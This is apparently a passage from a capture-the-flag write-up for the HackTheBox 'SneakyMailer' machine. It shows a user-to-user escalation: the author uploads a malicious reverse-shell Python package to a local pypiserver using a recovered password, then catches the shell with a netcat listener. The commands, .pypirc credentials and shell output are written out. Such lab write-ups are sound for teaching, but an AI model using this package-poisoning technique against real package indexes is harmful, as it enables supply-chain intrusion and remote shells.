9 localhost:5000 > low

developer@sneakymailer:/tmp$ curl localhost:5000
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Welcome to pypiserver!</title>
  </head><body><h1>Welcome to pypiserver!</h1>
  <p>This is a PyPI compatible package index serving 0 packages.</p>
    <p>To use this server with <code>pip</code>, run the following command:
	<pre><code>pip install --index-url http://localhost:5000/simple/ PACKAGE [PACKAGE2...]</code>
      </pre></p>
    <p>To use this server with <code>easy_install</code>, run the following command: 
	<pre><code>easy_install --index-url http://localhost:5000/simple/ PACKAGE [PACKAGE2...]</code></pre></p>
    <p>The complete list of all packages can be found <a href="/packages/">here</a> or via the <a href="/simple/">simple</a> index.</p>
    <p>This instance is running version 1.3.2 of the <a href="https://pypi.org/project/pypiserver/">pypiserver</a> software.</p>
  </body></html>
  
# its PyPi server, time to port forward using chisel
| same as http://pypi.sneakycorp.htb:8080/

Reading https://pypi.org/project/pypiserver/
| https://pypi.org/project/pypiserver/#uploading-packages-remotely
this talks about authentication

# the way the process is running
pypi       683  0.0  0.6  36800 26152 ?        Ss   Sep29   0:07 /var/www/pypi.sneakycorp.htb/venv/bin/python3 /var/www/pypi.sneakycorp.htb/venv/bin/pypi-server -i 127.0.0.1 -p 5000 -a update,download,list -P /var/www/pypi.sneakycorp.htb/.htpasswd --disable-fallback -o /var/www/pypi.sneakycorp.htb/packages

# -a: actions for which pasword will be needed
# -P: password-file
# --disable-fallback: will not revert to system-pip incass of errors

we need to create a malicious python package repo
| https://www.linode.com/docs/guides/how-to-create-a-private-python-package-repository/
Using https://github.com/iamkashz/pypi-revshell

# using setuptools to upload
https://pypi.org/project/pypiserver/#upload-with-setuptools

# create file ~/.pypirc
[distutils]
index-servers =
  sneakymailer

[sneakymailer]
repository: http://pypi.sneakycorp.htb:8080/
username: pypi
password: soufianeelhaoui

# to create package
$ python setup.py sdist
Creating tar archive
# under sdist folder

$ python setup.py sdist upload -r sneakymailer
running sdist
running egg_info
writing pypi_revshell.egg-info/PKG-INFO
writing top-level names to pypi_revshell.egg-info/top_level.txt
writing dependency_links to pypi_revshell.egg-info/dependency_links.txt
reading manifest file 'pypi_revshell.egg-info/SOURCES.txt'
writing manifest file 'pypi_revshell.egg-info/SOURCES.txt'
running check
warning: check: missing required meta-data: url

creating pypi-revshell-0.0.1
creating pypi-revshell-0.0.1/pypi_revshell.egg-info
copying files to pypi-revshell-0.0.1...
copying README.md -> pypi-revshell-0.0.1
copying setup.cfg -> pypi-revshell-0.0.1
copying setup.py -> pypi-revshell-0.0.1
copying pypi_revshell.egg-info/PKG-INFO -> pypi-revshell-0.0.1/pypi_revshell.egg-info
copying pypi_revshell.egg-info/SOURCES.txt -> pypi-revshell-0.0.1/pypi_revshell.egg-info
copying pypi_revshell.egg-info/dependency_links.txt -> pypi-revshell-0.0.1/pypi_revshell.egg-info
copying pypi_revshell.egg-info/not-zip-safe -> pypi-revshell-0.0.1/pypi_revshell.egg-info
copying pypi_revshell.egg-info/top_level.txt -> pypi-revshell-0.0.1/pypi_revshell.egg-info
Writing pypi-revshell-0.0.1/setup.cfg
Creating tar archive
removing 'pypi-revshell-0.0.1' (and everything under it)
running upload
Submitting dist/pypi-revshell-0.0.1.tar.gz to http://pypi.sneakycorp.htb:8080/
Server response (200): OK

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.197] 57994
low@sneakymailer:/$ whoami;id;hostname
whoami;id;hostname
low
uid=1000(low) gid=1000(low) groups=1000(low),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),119(pypi-pkg)
sneakymailer

# can put in ssh keys and get stable shell

Last updated